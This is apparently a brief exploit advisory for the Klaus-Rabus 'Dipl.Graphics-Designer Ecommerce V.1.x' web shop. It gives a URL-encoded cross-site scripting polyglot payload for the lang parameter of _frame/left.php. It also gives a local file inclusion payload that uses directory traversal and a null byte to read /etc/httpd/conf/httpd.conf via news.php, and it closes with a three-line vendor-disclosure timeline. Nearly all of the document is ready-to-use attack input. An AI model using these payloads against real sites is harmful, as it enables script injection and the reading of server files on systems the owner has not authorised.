================================================================
    Klaus-rabus Dipl.Graphics-Designer Ecommerce V.1.x Multiple Vulnerabilities
================================================================
Vendor: Dipl. Graphics-Designer (KH)
Site     : Http://www.klaus-rabus.de
Author : R3VAN_BASTARD
================================================================
XSS Exploit:
%27;alert%28String.fromCharCode%28102,111,117,110,100,32,66,121,32,82,101,118,97,110
%29%29//\%27;alert%28String.fromCharCode%28102,111,117,110,100,32,66,121,32,82,101,118,97,110
%29%29//%22;alert%28String.fromCharCode%28102,111,117,110,100,32,66,121,32,82,101,118,97,110
%29%29//\%22;alert%28String.fromCharCode%28102,111,117,110,100,32,66,121,32,82,101,118,97,110
%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode
%28102,111,117,110,100,32,66,121,32,82,101,118,97,110%29%29%3C/SCRIPT%3E

File: Http://Localhost.com/_frame/left.php?lang=<XSSExploit>
================================================================
Local File Inclusion [LFI]:
File: Http://Localhost.com/news.php?lang=[LFI]
Exploit: ../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
================================================================
1. Vendor has been contacted
2. Vendor Hit back, and do patching
3. Advisore release
================================================================